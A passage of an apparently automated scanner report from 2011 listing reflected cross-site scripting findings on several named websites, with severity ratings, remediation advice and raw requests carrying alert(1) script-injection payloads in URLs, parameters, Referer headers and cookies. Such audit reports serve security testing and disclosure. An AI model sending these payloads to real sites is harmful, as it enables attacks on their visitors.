Path:   /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c0f8"-alert(1)-"c3413ccd55d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp3c0f8"-alert(1)-"c3413ccd55d HTTP/1.1
Host: www.tradingmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:07:53 GMT
Server: Apache
Set-Cookie: TestCookie=test
Cache-Control: max-age=1
Expires: Mon, 31 Jan 2011 20:07:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23269

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t
...[SNIP]...
pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp3c0f8"-alert(1)-"c3413ccd55d&from=");
}
catch(err) {}
</script>
...[SNIP]...

1.291. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingmarkets.com
Path:   /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60a60"-alert(1)-"89da19402b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp?60a60"-alert(1)-"89da19402b=1 HTTP/1.1
Host: www.tradingmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:07:44 GMT
Server: Apache
Set-Cookie: TestCookie=test
Cache-Control: max-age=1
Expires: Mon, 31 Jan 2011 20:07:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23243

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t
...[SNIP]...
pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp?60a60"-alert(1)-"89da19402b=1&from=");
}
catch(err) {}
</script>
...[SNIP]...

1.292. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingmarkets.com
Path:   /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp

Issue detail

The value of the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39cc"-alert(1)-"dd4c962d003 was submitted in the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22c39cc"-alert(1)-"dd4c962d003 HTTP/1.1
Host: www.tradingmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:07:45 GMT
Server: Apache
Set-Cookie: TestCookie=test
Cache-Control: max-age=1
Expires: Mon, 31 Jan 2011 20:07:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t
...[SNIP]...
55558.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22c39cc"-alert(1)-"dd4c962d003&from=");
}
catch(err) {}
</script>
...[SNIP]...

1.293. http://www.channelinsider.com/c/a/Security/Social-Media-Applications-a-Threat-to-Businesses-Report-707207/x22 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.channelinsider.com
Path:   /c/a/Security/Social-Media-Applications-a-Threat-to-Businesses-Report-707207/x22

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4172"-alert(1)-"4c95e7bfff4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/a/Security/Social-Media-Applications-a-Threat-to-Businesses-Report-707207/x22 HTTP/1.1
Host: www.channelinsider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c4172"-alert(1)-"4c95e7bfff4

Response (redirected)

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Mon, 31 Jan 2011 19:28:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.1.6
Content-Length: 3824

<html>
<head>
<title>404 Error Page</title>
</head>

<body>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(u
...[SNIP]...
<!--
s.pageName=""
s.referrer = "http://www.google.com/search?hl=en&q=c4172"-alert(1)-"4c95e7bfff4"
s.server=""
s.channel="eWEEK Home>
...[SNIP]...

1.294. http://www.haymarketbusinesssubs.com/subscriptions/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c06c0"-alert(1)-"9b7cacd62d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/ HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c06c0"-alert(1)-"9b7cacd62d8

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:48:02 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970727;expires=Wed, 23-Jan-2041 19:48:02 GMT;path=/
Set-Cookie: CFTOKEN=97334119;expires=Wed, 23-Jan-2041 19:48:02 GMT;path=/
Set-Cookie: JSESSIONID=56309fd6b1301d2c6639;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
"DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?::REFERER::HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=C06C0"-ALERT(1)-"9B7CACD62D8";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTION SETTINGS
   hbx.fv="";//FORM VALIDATI
...[SNIP]...

1.295. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tradingmarkets.com
Path:   /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c833"-alert(1)-"31f58088b84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp HTTP/1.1
Host: www.tradingmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1c833"-alert(1)-"31f58088b84

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:07:45 GMT
Server: Apache
Set-Cookie: TestCookie=test
Cache-Control: max-age=1
Expires: Mon, 31 Jan 2011 20:07:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23269

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t
...[SNIP]...
page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp&from=http://www.google.com/search?hl=en&q=1c833"-alert(1)-"31f58088b84");
}
catch(err) {}
</script>
...[SNIP]...

1.296. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload dbc0e<script>alert(1)</script>82c7a78d6e was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087570&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&; BMX_3PC=1dbc0e<script>alert(1)</script>82c7a78d6e; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 17:09:08 2011&prad=58087570&arc=40401740&; expires=Sun 01-May-2011 17:09:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26752

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087570",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
2Cwait%2D%3E10000%2C', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "BMX_3PC": '1dbc0e<script>alert(1)</script>82c7a78d6e', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

1.297. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 899db<script>alert(1)</script>28541a05e7e was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087570&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C899db<script>alert(1)</script>28541a05e7e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 17:09:08 2011&prad=58087570&arc=40401740&; expires=Sun 01-May-2011 17:09:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26753

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087570",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C899db<script>alert(1)</script>28541a05e7e', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

1.298. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 511e0<script>alert(1)</script>f44b0675936 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810511e0<script>alert(1)</script>f44b0675936

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:07 2011&recExp=Mon Jan 31 17:09:07 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493747; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25118

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location:
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810511e0<script>alert(1)</script>f44b0675936', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan
...[SNIP]...

1.299. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 105b8<script>alert(1)</script>9f76ef43bcd was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&105b8<script>alert(1)</script>9f76ef43bcd; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:06 2011&recExp=Mon Jan 31 17:09:06 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:06 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493746; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25118

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location:
...[SNIP]...
d Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&105b8<script>alert(1)</script>9f76ef43bcd', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.co
...[SNIP]...

1.300. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

